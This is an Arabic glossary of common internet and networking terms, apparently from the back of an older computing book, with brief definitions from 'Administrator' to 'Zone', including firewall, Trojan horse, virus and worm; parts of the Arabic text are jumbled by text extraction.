) وازدادت شعبیتھا بفضل انتشار متصفحات ويب) Browsers Web انظر سھلة االستخدام) HTML )VRML ، وHTTP ، و

568

مصطلحات شائعة

A(

Administrator -المدير

شخص يقوم بإعداد مصادر الشبكة وتسجیل المستخدمین وأرقامھم .السرية وصیانة المصادر

Agent -عمیل

، ذلك الجزء من النظام ) Server/Client) (الموفر/العمیل(في نظام الذي ينفذ عملیة إعداد وتبادل المعلومات نیابة عن برنامج المضیف

Host أو الموفر Server.

Alert -تحذير

.تقرير عن وجود خطأ بشكل صندوق تحذير أو صوت يطلقه الكمبیوتر

ASCII -كیة لتبادل المعلومات قاعدة المعايیر األمري

American Standard Code for Information Interchange معیار لتحويل األحرف إلى أرقام وتحتوي على سبعة جزيئات بقیمة ثنائیة تتراوح بین

.127الصفر و

Anonymous -مجھول

يتم استخدامه كاسم مستخدم للدخول على بعض الكمبیوترات .البعیدة

Authentication -التوثیق

.تعريف ھوية شخص أو اإلجراءات الخاصة بذلك

569

B(

Band Width - عرض النطاق

ھي كمیة المعلومات التي يمكنك إرسالھا على خط معین في وقت Bits per Secondعرض النطاق يقاس بعدد النبضات في الثانیة . محدد

).bps(وتكتب

BBS -لوحة إعالنات النظام

معینة يوفر رسائل إلكترونیة وملفات إضافة كمبیوتر مزود ببرامج .للخدمات األخرى

Binary -ثنائي

، وھي الوسیلة التي يعمل بھا 1 و 0وسیلة عد تستخدم الرقمین الكمبیوتر داخلیا، وتحتوي الملفات الثنائیة على ثمان جزئیات تتراوح

255بین صفر و

Browser -متصفح

.WWWة العنكبوتیة برنامج يستخدم لإلبحار في الشبك

C(

Client -تابع

جھاز كمبیوتر يقوم بطلب الخدمة من جھاز كمبیوتر آخر، فعندما يطلب فإنه يعتبر تابع لموفر الخدمة ISPكمبیوتر اشتراك مع موفر خدمة

)Client of ISP.(

Compression -ضغط

.خطوات ضغط المعلومات لتخزين الملف في مساحة أصغر

Connection -بط ر

.وسیلة اتصال بین جھازي كمبیوتر

570

Crack -تخريب

مصطلح يطلق على برنامج يقوم بفك شفرة أحد البرامج المشتركة .وجعله مجاني

Cracker -مخرب

.شخص يحاول الدخول على نظام ما دون تصريح ويسبب له أضرار

D(

Data -بیانات

مج، معلومات وبشكل خاص المعلومات المستخدمة بواسطة البرا .bitأصغر وحدة في المعلومة يمكن للكمبیوتر فھمھا ھي

Default -بديل افتراضي

قیمة أو فعل أو ترتیب يقوم الكمبیوتر بافتراضه في حال عدم قیام ھذا النظام يمنع . المستخدم بإعطاء تعلیمات صريحة بخالف ذلك

البرنامج من التعطل أو االصطدام في حال عدم إعطاء قیمة بواسطة .المستخدم

Device -جھاز

مثل الشاشة Hardwareاألجزاء التي يتركب منھا الكمبیوتر .1والطابعة وخالفه، ھذه األجزاء يمكن أن يطلق علیھا أيضا األجزاء

ألنھا منفصلة بصورتھا المادية عن الكمبیوتر Peripheralالخارجیة .ولكنھا مربوطة به

الخارجیة التي يمكنھا جزء من الكمبیوتر أو قطعة من األجھزة .2 .نقل المعلومات

أي قطع أو معدات يمكن ربطھا بالشبكة مثل الكمبیوتر والطابعة .3 .وموفر الملفات وموفر الطابعة وخالفه

571

up-Dial -اتصال

لربط الكمبیوتر باستخدام مودم بخدمة ISDNاستخدام التلیفون أو وھذا ectionPermenant Connوھي عكس االتباط المستمر . االنترنت

.يعني أنه كي تحصل على الخدمة فإنه علیك أن تعمل مكالمة ھاتفیة

Domain -حقل

الذي يحدد مكان شبكة كمبیوترك وموقعھا DNSھو ذلك الجزء من الـ .في العالم

DNS -نظام أسماء الحقول

Domain Name System ھو نظام لتحديد العناوين الشبكیة IP Addresses يتكون من DNSالـ .. Domainsلكمبیوترات المسماة والحقول المطابقة ل

خدمة أسماء الحقول ... سلسلة من المعلومات تفصل بینھا نقاطDomain Name Service ھي عبارة عن برنامج يقوم بتحويل أسماء

.IP Addresses إلى عناوين شبكیة Domain Namesالحقول

E(

Electronic Mailالبريد االلكتروني

وھو نظام يمكن بموجبه لمستخدم الكمبیوتر تبادل mail-eرمز له يالرسائل مع مستخدم آخر أو مجموعة مستخدمین بواسطة شبكة

أو Outlook: اتصال، ويحتاج البريد االلكتروني إلى برنامج بريد مثلEudoraلیتمكن من االرسال .

Emotion -رموز المشاعر

، :) ابتسامة « لى االنترنت مثل رموز تستخدم للتعبیر عن المشاعر ع »:( غضب

Encryption -التشفیر

572

ھو معالجة كتلة من المعلومات بھدف منع أي شخص من قراءة تلك المعلومة باستثناء الشخص المقصود إرسالھا إلیه، وھناك العديد من

.أنواع التشفیر

F(

FAQs -األسئلة المتكررة

Frequently Asked Questionsلى االنترنت الغرض منھا فحص وثیقة عوتدقیق المعلومات التي يحتاج إلیھا الكثیر من األشخاص بصفة

.متكررة

Firewall -جدار نار

نظام تأمین لتقیید عملیة الدخول على الكمبیوترات الموجودة على . من أي مكان في الخارجLANشبكة محلیة

Flame -التطھیر

أو القوائم البريدية Usenetلى ردة فعل غاضبة لرسالة تم نشرھا عMailing List أو لوحات النقاش Message Boards التطھیر يحدث لعدة ،

أسباب مثل تعمیم رسالة على االنترنت أو طرح سؤال توجد إجابته ، حرب التطھیر قد تحدث عندما يرد شخص تعرض FAQsفي الـ

.للتطھیر على الرسالة أو الرسائل التي وصلته

G(

ayGatew -بوابة

لم يعد يستخدم حالیا ، والبوابة ھي أداة أو ) Gatewayبوابة (مصطلح .برنامج اتصال يقوم بتسییر المعلومات من شبكة إلى أخرى

Gopher -خدمة جوفر

نظام طورته جامعة مینیسوتا األمريكیة بھدف تسھییل عملیة وائم استخدام االنترنت وھو يعتمد على عملیة البحث من خالل الق

يمكنه اإلشارة الى الملفات Gopher. لقراءة الوثائق ونقل الملفات . وغیرھاWAIS ومراكز معلومات Telnetومواقع

573

H(

Hacker -متطفل

المتطفل ھو الشخص الذي يشعر بالفخر لمعرفته بطرق العمل الداخلیة للنظام أو الكمبیوتر أو الشبكات بحیث يسعى للدخول علیھا

.دون تصريح

ostH -مضیف

للكمبیوتر الذي يتیح ) Hostمضیف ( غالبا ما يستخدم مصطلح .للمستخدمین الدخول علیه

HTTP -بروتوكول نقل النص التشعبي

HTTP ھي وسیلة تجعل من الممكن التصفح عبر وثائق الشبكة العنكبوتیة، المستخدم يضغط على نقاط ربط موجودة على وثیقة

مكنه من الذھاب إلى تلك الوثیقة حتى لو الشبكة العنكبوتیة مما ي .كانت موجودة على جھاز آخر

I(

ISDN -الشبكة الرقمیة للخدمات الموحدة

Intergrated Services Digital Network ھي تكنولوجیا جديدة تحتوي على شبكات صوتیة ورقمیة في وسیلة واحدة وتعتبر خدمة اتصاالت

.فائقة السرعة

IP -نترنت بروتوكول اال

Internet Protocol ھو طبقة الشبكة الخاصة بحاشیة بروتوكول IP/TCP IPوالـ. والتي تستخدمھا األدوات على االنترنت لالتصال ببعضھا

Address) ھو العنوان الخاص بكل كمبیوتر ) عنوان بروتوكول االنترنت IP/TCP( طريقتین للكتابة اما رقمیة IPمتصل بشبكة ولكل عنوان الـ

574

dressAd ( أو حرفیة 212.26.66.3مثل )FQDN ( وھي العناوين التي والعنوان الحقیقي uk.co.empac.ftpنكتبھا عادة في المتصفحات مثل

ھو الرقمي ولكن لصعوبة حفظه فنكتب العنوان الحرفي ولكن في الشبكة داخلیا يتم ترجمة العنوان الحرفي الى العنوان الرقمي

.المطابق له

ISP -خدمة االنترنت مقدم

Internet Service Provider عادة - ھو الشركة التي يقوم المستخدم - باالشتراك لديھا للحصول على ربط باالنترنت، وھذه الشركة مرتبطة

.CIXباالنترنت مباشرة من احدى الشركات األعضاء في

J(

JPEG

وسیلة لضغط الصور المستخدمة في االنترنت

K(

Kilobit -كیلو بت

وتستخدم عادة في تحديد الطاقة , ب1024وحدة قیاس تعادل االستیعابیة للذاكرة

Kilobyte -كیلو بايت

. بايت1024وحدة قیاس تعادل

L(

Layer -طبقة

شبكات الكمبیوتر قد تنظم على شكل مجموعة أعداد أكثر أو أقل من وقد تسمى مستوىLayerالبروتوكوالت المستقلة كل منھا في طبقة

Level.

Login -تسجیل

575

أي أن تقوم بتسجیل اسمك كمستخدم لنظام أو شبكة فیصبح لديك .Login Nameاسم مستخدم

Log off -انھاء عملیة التسجیل

.ھو اخبار النظام بانك أنھیت عملك وستقطع االرتباط

Lurking -التواري

يستخدم ھذا المصطلح للتعبیر عن شخص لیس لديه مشاركة نشطة مجموعة االخبار او لوحة النقاش أو قائمة البريد التي اشترك في

معھا، ويفضل التواري لألشخاص المبتدئین الذين يريدون التأقلم في البداية مع اآلخرينز

M(

Mailing List -قائمة بريد

كل شخص مشترك في ھذه . قائمة بعناوين الكترونیة لعدة أشخاصت ھذه القائمة الى كمبیوتر القائمة يرسل موضوعا يخص اھتماما

رئیسي يقوم بتحويل ھذه الرسالة الى جمیع المشتركین في القائمة وتعني أن الرسالة ترسل في Moderatedالبريدية، ھناك قوائم معدلة

البداية الى صاحب ھذ ه القائمة لیدقق فیھا واذا تأكد من صالحیتھا وتقوم oderatedUnmيقوم بارساله للبقیة وھناك قوائم غیر معدلة

.بارسال الرسالة أتوماتیكیا للمشتركین

Megabyte -میجا بايت

. بايت1048576 كیلو بايت أو 1024وحدة قیاس تعادل

MIME - توصیلة بريد االنترنت المتعددة األغراض

Multipurpose Internet Mail Extension نظام لتوفیر القدرة على نقل صور والصوت والفاكس من خالل البريد البیانات غیر النصیة كال

.االلكتروني

576

N(

Netiquette -آداب الشبكات

االلتزام بقواعد سلوك مالئمة عند استخدام الشبكة

NETBIOS -نظام شبكة المدخالت والمخرجات األساسي

Network Basic Output System/Input يسمح لألجھزة التي تعمل بنظام DOSنفس االسم ھو اسم . ال خدمات الشبكة من التحدث مع واستعم

بروتوكول شبكة محلیة يستخدم بشكل واسع في منتجات .میكروسوفت

Newsgroup -مجموعة أخبار

مجموعة تكون معا 16.000مجموعات األخبار التي قد يصل عددھا الى ، وھي بمثابة الصحف التي تناقش جمیع موضوعات الحیاة Usenetالـ

ببالك، ومعظم موفري الخدمة يوجد لديھم موفر وأي موضوع قد يخطر .Newsgroup Serverمجموعات أخبار

O(

Line-Off/Line-On -غیر متصل/ متصل

Line-On تعني أن الكمبیوتر متصل حالیا بالشبكة وعكسه Line-Off أي .غیر متصل

P(

PING -مجمع كتلة االنترنت

Packet InterNet Grouperار القدرة الوصولیة برنامج يستخدم الختب الیھا وانظار الرد ICMPوذلك بارسال طلب صدى

577

PPP -بروتوكول نقطة الى نقطة

Point Protocol-to-Point إحدى وسیلتین لتبادل كتل البیانات عبر انترنت PPPبروتوكول ) SLIPالوسیلة األخرى ھي ( بواسطة خطوط الھاتف

.طاء واليزال تحت التطويريوفر وسیلة ضغط للبیانات وتصحیح األخ

POP -بروتوكول مكتب البريد

Post Office Protocol يسمح للمستخدم بتخزين رسائله في كمبیوتر شركة توفیر الخدمة كي يقوم باسترجاعھا فیما بعد، وھناك ثالث

.3POP و 2POP و POPطبعات لھذا النظام

Port - منفذ( میناء(

قبل .. بیوتر مضیف على االنترنتتحديد موقع برنامج معین على كم 23سنوات قلیلة كان على المستخدم تحديد البورت بنفسه؛ المنفذ

، أما الیوم فمعظم البرامج FTP خاص بالـ21 والمنفذ Telnetخاص بالـ .تحدد المنفذ اتوماتیكیا

Proxy -تفويض

بالرد على طلبات للدخول - موجه غالبا -طريقة يقوم بمقتضاھا جھاز لى مواقع معینة وبذلك يقوم بتنفیذ ھذا الطلب بناء على األوامر ع

.التي تلقاھا وعلى التوجیه الذي صمم علیه

Q(

Queue -صف

كتل احتیاطیة تنتظر المعالجة

R(

RAM -ذاكرة الدخول العشوائي

578

Access-Random Memory الجزء من ذاكرة الكمبیوتر الذي يقوم بتخزين أغلب . مؤقتة بینما ھي تحت االستخدام المعلومات بصفة

من ذاكرة الرام، ھذه المعلومات اذا KB 512الكمبیوترات تحتوي على .أغلقت الجھاز ولم تحفظھا تختفي الى األبد

Remote -بعید

اليمكن ربطه مباشرة باستخدام أسالك محلیة ولكنه يحتاج الى أدوات .اتصال

Router -موجه

القرارات الخاصة بتحديد اتجاھات الحركة على نظام كمبیوتر يتخذ .االنترنت

S(

SLIP -بروتوكول االنترنت ذو الخط المتسلسل

Serial Line Internet Protocol ھو بروتوكول يستخدم لتشغیل بروتوكول عادة . كدوائر الھاتفSerial Lines على خطوط متسلسلة IPاالنترنت

.SLIP أو PPPما عند االرتباط بموفر خدمة يستخدم ا

Server - موفر( خادم(

.. جھاز يفتح للمستخدمین لتوفیر الخدمات لھم كنقل الملفات وغیرھا Client يسمى Serverالشخص الذي يدخل على الـ

Shell -المحارة

.برنامج يوفر للمستخدم القدرة على التفاعل مع الكمبیوتر

SMTP -بروتوكول نقل البريد البسیط

.تخدم لنقل البريد االلكتروني بین األجھزةبروتوكول يس

Spamming -التعمیم

579

مصطلح يطلق على عملیة تعمیم رسالة في مجموعات األخبار أو .Flamingويقابله التطھیر . البريد االلكتروني

Standard - افتراضي( معیار(

مجموعة من المواصفات لتصمیم البرامج يتم االعتراف بھا من قبل .منظمة رسمیةبائعین أو

T(

1T

التي تستخدم Digital يعبر عن وسائل النقل الرقمیة AT&Tمصطلح في MB 1.5 االشارات الرقمیة المشكلة وذلك بسرعة DS-1لنقل

وھناك Leased Lineوذلك باستخدام خط مؤجر ) سرعة خارقة(الثانیة . في الثانیةMB 44.746 بسرعة DS-3 التي تستخدم لنقل 3Tأيضا

PTC -بروتوكول التحكم بالنقل

وھو IPيقوم ھذا البروتوكول بتمرير المعلومات الى بروتوكول االنترنت .مسئول عن التأكد من وصول الرسالة وأنھا مفھومة

Telenet -االتصال عن بعد

Telnet ھي بروتوكول انترنت معیاري لخدمات الربط عن بعد ويسمح ضیف جاعال جھازه وكأنه جزء للمستخدم بربط جھازه على كمبیوتر م

. من ذلك الكمبیوتر البعید

Trojan Horse -حصان طروادة

برنامج كمبیوتر يحمل داخله وسائل تسمح لمكونه الدخول الى النظام .الذي زرع فیه

URL -معین المصادر المنتظم

580

Uniform Resourse Locator وسیلة معیارية لإلشارة للمصادر تقوم . الخدمة باالضافة الى موقع الملف أو الدلیلبتحديد نوع

Unix -نظام يونیكس

نظام تشغیل تستخدمه معظم شركات توفیر الخدمة ويقوم بربط عدة . به للدخول علیهClientsأجھزة تابعة

Usenet -شبكة المستخدم

مجموعة أخبار تھتم 16.000شبكة من مجموعات األخبار تتكون من .بجمیع شؤون الحیاة

V(

Virus -فیروس

برنامج يكرر ويضاعف نفسه عن طريق دمج نفسه بالبرامج األخرى .ويضر الكمبیوتر كثیرا

W(

White Pages -الصفحات البیضاء

.مراكز معلومات توفر خدمات ومعلومات عن أشخاص معینین

Whois

برنامج يتیح لمستخدمه البحث في مراكز المعلومات عن أشخاص .وعناوين

SWAI

نظام يتیح لمستخدمه البحث عن موضوع معین باستخدام كلمات .Keywordsمفتاحیة

581

Winsock

نظام التقاء في ويندوز، واذا أردت الدخول على االنترنت فیجب أن المشكلة . موضوع داخل النظامdll.winsockيتوفر لديك ملف يدعى

طبعة التي تتكرر كثیرا ھي أنه لیس جمیع البرامج تعمل مع نفس winsock تطبیق trumpet الذي يستعمله الكثیرون يستخدم لتوفیر ربط

SLIP بین حاسباتھموتقوم االنترنت بتوفیر نسخة من winsock.

WWW -الشبكة العنكبوتیة العالمیة

كي يتمكن Hybertext linkبرنامج يعمل باستخدام نقاط ربط .المستخدم من التصفح بواسطة النقر على الروابط

Worm -دودة

برنامج يكرر نفسه ولكنه يتكاثر في الشبكة بشكل مقصود بعكس ربما يكون األشھر فقد 1988الفیروسات، دود االنترنت الذي حدث عام

. نظام6000استطاع الدود أن يتكاثر في أكثر من

WYSIWYG -ماتراه ھو ماتحصل علیه

What You See Is What You Getض برامج ھومصطلح يطلق على بعتصمیم صفحات الويب التي تتیح رؤية ماستكون الصفحة علیه من

.خالل البرنامج نفسه

X(

X - Modem

.بروتوكول يستخدم لنقل الملفات بین حاسبین عادة بواسطة مودم

Y(

582

Yellow Pages -الصفحات الصفراء

بغرض ادارة مراكز المعلومات UNIXخدمة تستخدم بواسطة اداريي . عبر الشبكةالموزعة

Y - Modem


Z(

Z - Modem


Zone -نطاق

.Apple Talkمجموعة من أدوات الشبكة